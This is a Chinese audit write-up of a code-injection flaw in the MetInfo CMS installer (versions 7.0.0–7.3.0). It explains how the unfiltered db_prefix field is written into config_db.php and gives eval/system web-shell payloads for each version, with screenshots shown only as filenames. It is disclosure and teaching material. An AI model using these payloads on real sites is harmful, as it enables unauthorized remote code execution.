米拓建站系统1day审计与利用 – 作者:合天智汇

Metinfocms命令执行

前话

米拓企业建站系统是一款由长沙信息科技有限公司自主研发的免费开源企业级CMS,该系统拥有大量的用户使用,及对该款cms进行审计,如果利用CNVD-2021-01930进行进一步深入,其危害的严重性可想而知。

本文涉及相关实验:MetInfo SQL注入(通过该实验掌握MetInfo SQL注入漏洞的原因和利用方法,以及如何修复该漏洞。)

审计过程:

1. Index:拿到源码先看根目录的index.php看看都包含(加载)了什么文件。

headImg.action?news=c0799755-afcb-474d-8f8d-05e8cd1c2ac1.png

2. 关键词:在/app/system/entrance.php看到了配置文件的定义,全局搜索这个

’PATH_CONFIG‘参数。

headImg.action?news=014e1cfb-5b5b-47f0-9624-f5340b37c716.png

全局搜索并找到install/index.php文件下有这个参数,点击跟进查看。

headImg.action?news=5cd76e95-28f7-400d-8c53-bd423e68922f.png

在这个文件的219行有个是接收db数据库参数的方法。

官方说明“$_M”数组:https://doc.metinfo.cn/dev/basics/basics75.html

这里是接收from数据的db_prefix参数。也就是“数据表前缀”内容的值。

headImg.action?news=c6f656a7-d57b-4a93-8d5c-7e7689c8578e.png

往下发现是直接写入tableper然后赋值给config变量。

headImg.action?news=8c41b1a1-d4ad-4710-a576-b4e97dbd76cf.png

并在264行fopen打开/config/config_db.php进行没有安全过滤的字节流(fputs)方式的写入。

headImg.action?news=57c02093-403c-4450-a457-c93831553c94.png

影响版本:7.3.0 – 7.0.0

一、进行7.3.0安装步骤,访问http://127.0.0.1/install/index.php

headImg.action?news=64cafcfa-7a86-42b3-b175-0a1f0d2ebb24.png

二、选中传统安装继续下一步

headImg.action?news=bce0a51e-fb34-4bf5-9d2e-f26cde2a27bf.png

headImg.action?news=a6e6e757-e03e-44ae-8fa0-3e4445ac24bc.png

三、数据库信息进行写shell

代码执行Payload:”/@eval($_GET[‘1’]);/

命令执行Payload:”/@system($_GET[‘1’]);/

代码执行:

headImg.action?news=03898d8d-fc5d-4bd2-9689-1e0f80d609a8.png

headImg.action?news=30dcfda5-42bf-44bc-ba1d-ad2418ccda2b.png

点击保存进行下一步验证,出现这报错信息,可以查看config\config_db.php文件。

headImg.action?news=9d42d523-697d-4573-8ef5-f0529b4589b3.png

headImg.action?news=ffe4e699-f642-4646-bcbc-bec79d85f0b5.png

成功写入

headImg.action?news=461b2e77-5913-4bec-8da5-c7338e72b1c6.png

命令执行:

headImg.action?news=cfe16ede-0d73-4291-b117-56b819f98b43.png

headImg.action?news=31627047-33b1-43e8-b27d-89e5038ff2d2.png

headImg.action?news=2f787b35-a0b2-480a-9400-7f724b7ae954.png

7.0.0版本:

headImg.action?news=4139712c-7e1c-4c71-96f8-ca66ec437952.pngheadImg.action?news=80017084-4813-41d8-b1d5-06597ff6655f.png

headImg.action?news=e19b2ba3-cd56-4079-9e23-ed5f3c71dd70.png

headImg.action?news=1f3b89b9-8d60-4988-9d51-30222b8a01e2.png

7.1.0版本:

Payload:”/@eval($GET[‘1’]);@system($GET[‘2’]);/

headImg.action?news=bde46aca-08ec-4786-89ea-b366548c9a97.png

headImg.action?news=8eae2f86-f031-41aa-9d1a-32fb271d10c2.png

headImg.action?news=6703c335-29e8-4655-8e7c-00688ba8e62e.png

headImg.action?news=e16b3a3d-1aa8-4600-af23-67dd0d8ad193.png

7.2.0版本:

Payload:”/@eval($GET[‘1’]);@system($GET[‘2’]);/

headImg.action?news=095cce6e-93aa-4b0a-812b-3370ef31a3b0.png

headImg.action?news=17fe5d34-6b43-492b-b87b-f8ddb1760d26.png

headImg.action?news=4e66b739-0c4e-496e-8fec-f7dfd6618315.png

headImg.action?news=ca4c7850-4ddc-4363-9149-73a7880fa37e.png1

来源:freebuf.com 2021-07-01 16:46:50 by: 合天智汇

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论